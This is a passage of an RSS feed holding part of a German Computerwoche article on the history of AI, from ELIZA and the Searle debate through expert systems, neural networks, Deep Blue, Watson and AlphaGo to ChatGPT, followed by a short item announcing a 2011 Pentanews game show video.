<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Das Programm ELIZA von Joseph Weizenbaum ahmt einen Psychotherapeuten nach. Hier ein aus dem Englischen übersetztes Beispiel einer Sitzung, die von Weizenbaum aufgezeichnet wurde. Die menschlichen Inputs sind mit „M /&gt;“ gekennzeichnet, die Antwort des Computers ist mit „C&gt;“ angegeben." title="Das Programm ELIZA von Joseph Weizenbaum ahmt einen Psychotherapeuten nach. Hier ein aus dem Englischen übersetztes Beispiel einer Sitzung, die von Weizenbaum aufgezeichnet wurde. Die menschlichen Inputs sind mit „M&gt;“ gekennzeichnet, die Antwort des Computers ist mit „C&gt;“ angegeben." src="https://images.computerwoche.de/bdb/2683550/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Das Programm ELIZA von Joseph Weizenbaum ahmt einen Psychotherapeuten nach. Hier ein aus dem Englischen übersetztes Beispiel einer Sitzung, die von Weizenbaum aufgezeichnet wurde. Die menschlichen Inputs sind mit „M&gt;“ gekennzeichnet, die Antwort des Computers ist mit „C&gt;“ angegeben.</p></figcaption></figure><p class="imageCredit">
					Foto: Weizenbaum</p></div>




<h2 class="wp-block-heading">Denkende KI-Maschinen? – Starke und schwache KI</h2>



<p>In den siebziger Jahren begann ein heftig ausgefochtener Streit um den ontologischen Status von KI-Maschinen. Bezugnehmend auf die Arbeiten von Alan Turing formulierten Allen Newell und Herbert Simon von der Carnegie Mellon University die “Physical Symbol System Hypothesis”. Ihr zufolge ist Denken nicht anderes als Informationsverarbeitung, und Informationsverarbeitung ein Rechenvorgang, bei dem Symbole manipuliert werden. Auf das Gehirn als solches komme es beim Denken nicht an.</p>



<p>Diese Auffassung griff der Philosoph John Searle vehement an. Als Ergebnis dieser Auseinandersetzung stehen sich bis heute mit der schwachen und starken KI zwei konträre Positionen gegenüber. Die schwache KI im Sinne von John Searle behauptet, dass KI-Maschinen menschliche kognitive Funktionen zwar simulieren und nachahmen können. KI-Maschinen erscheinen aber nur intelligent, sie sind es nicht wirklich.</p>



<p>Ein zentrales Argument der schwachen KI lautet: Menschliches Denken ist gebunden an den menschlichen Körper und insbesondere das Gehirn. Kognitive Prozesse haben sich historisch im Zuge der evolutionären Entwicklung von Körper und Gehirn entwickelt. Damit ist Denken notwendigerweise eng verknüpft mit der Biologie des Menschen und kann nicht von dieser getrennt werden. Computer können zwar diese Denkprozesse imitieren, aber das ist etwas ganz anderes als das, wie Menschen denken. Sowenig, wie ein simuliertes Unwetter nass macht, sowenig ist ein simulierter Denkprozess dasselbe wie menschliches Denken.</p>



<p>Im Gegensatz dazu sagen die Anhänger der von Newell und Simon inspirierten starken KI, dass KI-Maschinen in demselben Sinn intelligent sind und denken können wie Menschen. Das ist nicht metaphorisch, sondern wörtlich gemeint. Für die starke KI spricht: So wie Computer aus Hardware bestehen, so bestehen auch Menschen aus Hardware. Im ersten Fall ist es Hardware auf Silizium-Basis, im zweiten Fall biologische “Wetware”. Es spricht grundsätzlich nichts dagegen, dass sich Denken nur auf einer spezifischen Form von Hardware realisieren lässt. Nach allem was man bislang aus der Gehirn- und Bewusstseinsforschung weiß ist eine gewisse Komplexität der Trägersubstanz eine notwendige (und vielleicht auch hinreichende) Bedingung für Denkprozesse. Sind KI-Maschinen also hinreichend komplex, denken sie in der gleichen Weise wie Sie und ich.</p>



<h2 class="wp-block-heading">Expertensysteme – die KI wird praktisch: 1975 bis 1985</h2>



<p>In der dritten Ära ab Mitte der 70er Jahre löste man sich von den Spielzeugwelten und versuchte praktisch einsetzbare Systeme zu bauen, wobei Methoden der Wissensrepräsentation im Vordergrund standen. Die KI verließ ihren Elfenbeinturm und KI-Forschung wurde auch einer breiteren Öffentlichkeit bekannt.</p>



<p>Die von dem US-Informatiker Edward Feigenbaum initiierte Expertensystem-Technologie beschränkt sich zunächst auf den universitären Bereich. Nach und nach entwickelten sich Expertensysteme jedoch zu einem kleinen kommerziellen Erfolg und waren für viele identisch mit der ganzen KI-Forschung – so wie heute für vieleMachine Learning identisch mit KI ist.</p>



<p>In einem Expertensystem wird das Wissen eines bestimmten Fachgebiets in Form von Regeln und großen Wissensbasen repräsentiert. Das bekannteste Expertensystem war das von T. Shortliffe an der Stanford University entwickelten MYCIN. Es diente zur Unterstützung von Diagnose- und Therapieentscheidungen bei Blutinfektionskrankheiten und Meningitis. Ihm wurde durch eine Evaluation attestiert, dass seine Entscheidungen so gut sind wie die eines Experten in dem betreffenden Bereich und besser als die eines Nicht-Experten.</p>



<p>Ausgehend von MYCIN wurden eine Vielzahl weiterer Expertensysteme mit komplexerer Architektur und umfangreichen Regeln entwickelt und in verschiedensten Bereichen eingesetzt. In der Medizin etwa PUFF (Dateninterpretation von Lungentests), CADUCEUS (Diagnostik in der inneren Medizin), in der Chemie DENDRAL (Analyse der Molekularstruktur), in der Geologie PROSPECTOR (Analyse von Gesteinsformationen) oder im Bereich der Informatik das System R1 zur Konfigurierung von Computern, das der Digital Equipment Corporation (DEC) 40 Millionen Dollar pro Jahr einsparte.</p>



<p>Auch das im Schatten der Expertensystem-Euphorie stehende Gebiet der Sprachverarbeitung orientierte sich an praktischen Problemstellungen. Ein typisches Beispiel ist das Dialogsystem HAM-ANS, mit dem ein Dialog in verschiedenen Anwendungsbereichen geführt werden kann. Natürlichsprachliche Schnittstellen zu Datenbanken und Betriebssystemen drangen in den kommerziellen Markt vor wie INTELLECT, F&amp;A oder DOS-MAN.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Expertensysteme wie MYCIN konnten mit Hilfe von Regeln und Wissensbasen Diagnose erstellen und Therapien empfehlen." title="Expertensysteme wie MYCIN konnten mit Hilfe von Regeln und Wissensbasen Diagnose erstellen und Therapien empfehlen." src="https://images.computerwoche.de/bdb/2683551/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Expertensysteme wie MYCIN konnten mit Hilfe von Regeln und Wissensbasen Diagnose erstellen und Therapien empfehlen.</p></figcaption></figure><p class="imageCredit">
					Foto: University of Science and Culture</p></div>




<h2 class="wp-block-heading">Die Renaissance neuronaler Netze: 1985 bis 1990</h2>



<p>Anfang der 80er Jahre kündigte Japan das ehrgeizige “Fifth Generation Project” an, mit dem unter anderem geplant war, praktisch anwendbare KI-Spitzenforschung zu betreiben. Für die KI-Entwicklung favorisierten die Japaner die Programmiersprache PROLOG, die in den siebziger Jahren als europäisches Gegenstück zum US-dominierten LISP vorgestellt worden war. In PROLOG lässt sich eine bestimmte Form der Prädikatenlogik direkt als Programmiersprache verwenden. Japan und Europa waren in der Folge weitgehend PROLOG-dominiert, in den USA setzte man weiterhin auf LISP.</p>



<p>Mitte der 80er bekam die symbolische KI Konkurrenz durch die wieder auferstandenen neuronalen Netze. Basierend auf Ergebnissen der Hirnforschung wurden schon in den vierziger Jahren durch McCulloch, Pitts und Hebb erste mathematische Modelle für künstliche neuronale Netze entworfen. Doch damals fehlten leistungsfähige Computer. Nun in den Achtzigern erlebte das McCulloch-Pitts-Neuron eine Renaissance in Form des sogenannten Konnektionismus.</p>



<p>Der Konnektionismus orientiert sich anders als die symbolverarbeitende KI stärker am biologischen Vorbild des Gehirns. Seine Grundidee ist, dass Informationsverarbeitung auf der Interaktion vieler einfacher, uniformer Verarbeitungselemente basiert und in hohem Maße parallel erfolgt. Neuronale Netze boten beeindruckende Leistungen vor allem auf dem Gebiet des Lernens. Das Programm Netttalk konnte anhand von Beispielsätzen das Sprechen lernen: Durch Eingabe einer begrenzten Menge von geschriebenen Wörtern mit der entsprechenden Aussprache als Phonemketten konnte ein solches Netz zum Beispiel lernen, wie man englische Wörter richtig ausspricht und das gelernte auf unbekannte Wörter richtig anwendet.</p>



<p>Doch selbst dieser zweite Anlauf kam zu früh für neuronale Netze. Zwar boomten die Fördermittel, aber es wurden auch die Grenzen deutlich. Es gab nicht genügend Trainingsdaten, es fehlten Lösungen zur Strukturierung und Modularisierung der Netze und auch die Computer vor der Jahrtausendwende waren immer noch zu langsam.</p>



<h2 class="wp-block-heading">Verteilte KI und Robotik: Künstliche Intelligenz zwischen 1990 und 2010</h2>



<p>Ab etwa 1990 entstand mit der Verteilten KI ein weiterer, neuer Ansatz, der auf Marvin Minsky zurückgeht. In seinem Buch “Society of Mind” beschreibt er den menschlichen Geist als eine Art Gesellschaft: Intelligenz, so Minsky, setzt sich zusammen aus kleinen Einheiten, die primitive Aufgaben erledigen und deren Zusammenwirken erst intelligentes Verhalten erzeugt. Minsky forderte die KI-Gemeinde auf, die individualistische Sackgasse zu überwinden und ganz andere, sozial inspirierte Algorithmen für Parallelrechner zu entwerfen.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Marvin Minsky gilt als Vater der Verteilten KI." title="Marvin Minsky gilt als Vater der Verteilten KI." src="https://images.computerwoche.de/bdb/2680348/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Marvin Minsky gilt als Vater der Verteilten KI.</p></figcaption></figure><p class="imageCredit">
					Foto: Creative Commons</p></div>




<p>Sein Schüler Carl Hewitt setzte ein erstes handfestes Modell um, in dem primitive Einheiten – er nannte sie Actoren – miteinander Botschaften austauschten und parallel arbeiteten. Der Gedanke des sozial interagierenden KI-Systems war damit konkret geboren – und Carl Hewitt zum Vater des neuen Ansatzes der Verteilten KI bzw. Distributed AI geworden. Im Rückblick erweisen sich Minsky’s und Hewitt’s Ideen als der Beginn der Agententechnologie, bei der die Zusammenarbeit vieler verschiedener Agenten – sogenannte Multi-Agenten-Systeme -ein enormes Potenzial entfaltet.</p>



<p>Ein KI-Meilenstein in den 90er Jahren war der erste Sieg einer KI-Schachmaschine über den Schachweltmeister. 1997 bezwang der <a href="https://www.computerwoche.de/industry/" target="_blank" class="idgGlossaryLink">IBM</a>-Rechner Deep Blue in einem offiziellen Turnier den damals amtierenden Schachweltmeister Garry Kasparov. Dieses Ereignis galt als historischer Sieg der Maschine über den Menschen in einem Bereich, in dem der Mensch bislang die Oberhand hatte. Das Event sorgte weltweit für Furore und brachte IBM viel Aufmerksamkeit und Renommee. Heute gelten Computer im Schach als unschlagbar. Dennoch fiel auf den Sieg des Computers auch ein Schatten, weil Deep Blue seinen Erfolg weniger seiner künstlichen, kognitiven Intelligenz verdankte, sondern mit roher Gewalt (“Brute Force”) alle nur denkbaren Züge soweit wie möglich durchrechnete.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="1997 bezwang erstmals ein Computer – IBMs Deep Blue – den amtierenden Schachweltmeister." title="1997 bezwang erstmals ein Computer – IBMs Deep Blue – den amtierenden Schachweltmeister." src="https://images.computerwoche.de/bdb/2683553/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">1997 bezwang erstmals ein Computer – IBMs Deep Blue – den amtierenden Schachweltmeister.</p></figcaption></figure><p class="imageCredit">
					Foto: IBM</p></div>




<p>In dieser Zeit bekam auch die bis dahin eher dahindümpelnde <a href="https://www.computerwoche.de/article/2762550/autonome-helfer-auf-raedern-erobern-werkshallen.html" target="_blank" class="idgGlossaryLink">Robotik</a> neuen Auftrieb. Der ab 1997 jährlich ausgetragene RoboCup demonstrierte eindrucksvoll, was KI und Robotik leisten können. Wissenschaftler und Studenten aus der ganzen Welt treffen sich seitdem regelmässig, um ihre Roboter-Teams gegeneinander im Fußball antreten zu lassen. Inzwischen fechten die mobilen Roboter auch andere Wettkämpfe aus als Fußball. Ab etwa 2005 entwickeln sich Serviceroboter zu einem dominanten Forschungsgebiet der KI und um 2010 beginnen autonome Roboter, ihr Verhalten durch maschinelles Lernen zu verbessern.</p>



<h2 class="wp-block-heading">Die kommerzielle Wende: KI ab 2010</h2>



<p>Die aktuelle KI-Phase startete etwa um 2010 mit der beginnenden Kommerzialisierung. KI-Anwendungen verließen die Forschungslabors und machten sich in Alltagsanwendungen breit. Insbesondere die KI-Gebiete maschinelles Lernen und Natural Language Processing boomen. Hinzu kommen neuronale Netze, die ihre zweite, diesmal sehr erfolgreiche Wiedergeburt erleben.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="IBM Watson war 2011 Sieger in einem Wissensquiz mit menschlichen Kandidaten. IBM vermarktet Watson nun als kognitives System für verschiedene Einsatzbereiche." title="IBM Watson war 2011 Sieger in einem Wissensquiz mit menschlichen Kandidaten. IBM vermarktet Watson nun als kognitives System für verschiedene Einsatzbereiche." src="https://images.computerwoche.de/bdb/2683555/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">IBM Watson war 2011 Sieger in einem Wissensquiz mit menschlichen Kandidaten. IBM vermarktet Watson nun als kognitives System für verschiedene Einsatzbereiche.</p></figcaption></figure><p class="imageCredit">
					Foto: IBM</p></div>




<p>Die Hauptursachen für die kommerzielle Wende waren verbesserte KI-Verfahren und leistungsfähigere Software und Hardware: Softwareseitig erwiesen sich die weiter entwickelten neuronalen Netze und vor allem eine Variante – Deep Learning – als sehr robust und vielseitig einsetzbar. Weitere Trends wie Multi-Core-Architekturen, verbesserte Algorithmen und superschnelle In-Memory-Datenbanken machten KI-Anwendungen gerade auch für den Unternehmensbereich attraktiv. Ein zusätzlicher Faktor ist auch die zunehmende Verfügbarkeit großer Mengen strukturierter und unstrukturierter Daten aus einer Vielzahl von Quellen wie Sensoren oder digitalisierten Dokumenten und Bildern, mit denen sich die Lernalgorithmen “trainieren” lassen.</p>



<p>Im Zuge dieser verbesserten technischen und ökonomischen Möglichkeiten entdeckten auch die großen IT-Konzerne die KI: Den Grundstein legte 2011 <a href="https://www.computerwoche.de/industry/" target="_blank" class="idgGlossaryLink">IBM</a> mit Watson. Watson kann natürliche Sprache verstehen und schwierige Fragen sehr schnell beantworten. 2011 konnte Watson in einem US-amerikanischen TV-Quiz zwei menschliche Kandidaten beeindruckend schlagen. In der Folge baute IBM Watson zu einem kognitiven System aus, das Algorithmen der natürlichen Sprachverarbeitung und des Information Retrieval, Methoden des maschinellen Lernens, der Wissensrepräsentation und der automatischen Inferenz vereinte. Inzwischen wurde Watson in verschiedenen Gebieten wie Medizin und Finanzwesen erfolgreich angewendet und IBM hat einen Großteil seines Business auf Watson ausgerichtet.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Maschine schlägt Mensch: 2016 besiegte Google’s Machine Learning System AlphaGo den Weltmeister im Spiel Go." title="Maschine schlägt Mensch: 2016 besiegte Google’s Machine Learning System AlphaGo den Weltmeister im Spiel Go." src="https://images.computerwoche.de/bdb/2681344/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Maschine schlägt Mensch: 2016 besiegte Google’s Machine Learning System AlphaGo den Weltmeister im Spiel Go.</p></figcaption></figure><p class="imageCredit">
					Foto: Google</p></div>




<p>Andere Big Player zogen nach. Google, Microsoft, Facebook, Amazon und Apple investieren viele Millionen in KI und stellen KI-Anwendungen und -Services bereit. Ein weiteres großes Event der KI-Geschichte ereignete sich im Januar 2016: Damals konnte Googles AlphaGo den vermutlich weltbesten Go-Spieler mit 4 zu 1 besiegen. Wegen der größeren Komplexität von Go im Vergleich zu Schach ist das japanische Brettspiel mit traditionellen Brute-Force-Algorithmen, wie sie noch Deep Blue verwendete, praktisch nicht bezwingbar. Deep Learning und andere aktuelle KI-Verfahren führten hier zum Erfolg.</p>



<p>Heute sind KI- und Machine-Learning-Verfahren in unterschiedlichsten Ausprägungen nicht nur bei den großen IT-Konzernen im Einsatz. Vor allem große und mittelständische Anwenderunternehmen aus fast allen Branchen nutzen KI-basierte Systeme, um Prozesse zu verbessern, Kundenschnittstellen zu optimieren oder ganz neue Produkte und Märkte zu entwickeln. Die Vielzahl an einschlägigen Cloud-basierten Services hat den Einsatz auch für kleinere Organisationen ohne große Entwicklungsbudgets erschwinglich gemacht.</p>



<h2 class="wp-block-heading">Auf in den Mainstream: ChatGPT &amp; Generative AI ab 2022</h2>



<p>Seit OpenAI im November 2022 seinen KI-Chatbot ChatGPT öffentlich verfügbar gemacht hat, hat sich ein Hype entfaltet, der innerhalb der IT-Branche am ehesten mit dem großen Run auf die Cloud vergleichbar ist. Allerdings schaffte ChatGPT etwas, das anderen KI-Tools bis dahin kaum gelungen war – nämlich künstliche Intelligenz auch zum Dauergesprächsthema <a href="https://www.tagesschau.de/wissen/forschung/ki-kreativitaet-101.html" title="in den Mainstream-Medien" target="_blank" rel="noopener">in den Mainstream-Medien</a> zu machen. </p>



<p>ChatGPT rückte auch andere Tools wie DALL-E oder Stable Diffusion ins Rampenlicht und befeuerte die berufliche wie private Nutzung der Tools. Die werden häufig als Modelle bezeichnet, weil sie versuchen, einen Aspekt der realen Welt auf der Grundlage einer (manchmal sehr großen) Teilmenge von Informationen zu simulieren oder zu modellieren. Die Ergebnisse können Erstaunen hervorrufen, werfen aber auch <a title="Fragen auf" href="https://www.computerwoche.de/article/2803252/dumme-kuenstliche-intelligenz.html" target="_blank">Fragen auf</a>. Abseits des Hypes geht unter der glänzenden Oberfläche der Systeme <a title="weniger Revolutionäres vor sich" href="https://www.computerwoche.de/article/2820404/6-fakten-ueber-chatgpt.html" target="_blank">weniger Revolutionäres vor sich</a> als man glaubt: Im Grunde geht es bei Generative AI darum, mit Hilfe von <a class="idgGlossaryLink" href="https://www.computerwoche.de/article/2752649/was-sie-ueber-maschinelles-lernen-wissen-muessen.html" target="_blank">Machine Learning</a> große Datenmengen zu verarbeiten, die in vielen Fällen aus dem Netz zusammengesammelt und anschließend als Grundlage für Vorhersagen genutzt werden. </p>



<p>Wie ChatGPT sich selbst definiert, lesen Sie im <a title="COMPUTERWOCHE-Interview mit der KI-Instanz" href="https://www.computerwoche.de/article/2819836/was-ist-chatgpt.html" target="_blank">COMPUTERWOCHE-Interview mit der KI-Instanz</a>. Mehr Informationen zur Funktionsweise, Anwendungsfällen sowie den Limitationen von Generative AI erfahren Sie in unserem <a title="Grundlagenartikel zum Thema" href="https://www.computerwoche.de/article/2821922/was-ist-generative-ai.html" target="_blank">Grundlagenartikel zum Thema</a> sowie diesem weiterführenden Beitrag zum Thema <a title="Large Language Models" href="https://www.computerwoche.de/article/2823883/was-sind-llms.html" target="_blank">Large Language Models</a> (LLMs).</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Pentanews Game Show 2k11/2 (ds2011)]]></title>
<description><![CDATA[Die coole Pentanews gameshow hat das Publikum schon auf zahlreichen (3) Chaos-Events zum lachen und mitdenken gebracht.
In heiterer Runde geht es darum, details absurder News, die eh jeder schon bei fefe & co gelesen hat, zu ergänzen. 
Das is' aber dann doch immer gar nicht so einfach und deswege...]]></description>
<link>https://tsecurity.de/de/3650244/it-security-video/pentanews-game-show-2k112-ds2011/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650244/it-security-video/pentanews-game-show-2k112-ds2011/</guid>
<pubDate>Tue, 07 Jul 2026 03:33:23 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die coole Pentanews gameshow hat das Publikum schon auf zahlreichen (3) Chaos-Events zum lachen und mitdenken gebracht.
In heiterer Runde geht es darum, details absurder News, die eh jeder schon bei fefe &amp; co gelesen hat, zu ergänzen. 
Das is' aber dann doch immer gar nicht so einfach und deswegen stehen den Mitspielern hierfür mächtige Joker (wie z.B. aktuelles Meinungsbild aus dem IRC) zur Seite.

Diesmal mit ganz neuen Buzzern und anderen Improvements seit dem letzten Mal.
about this event: https://datenspuren.de/2011/fahrplan/events/4629.de.html]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,24ms -->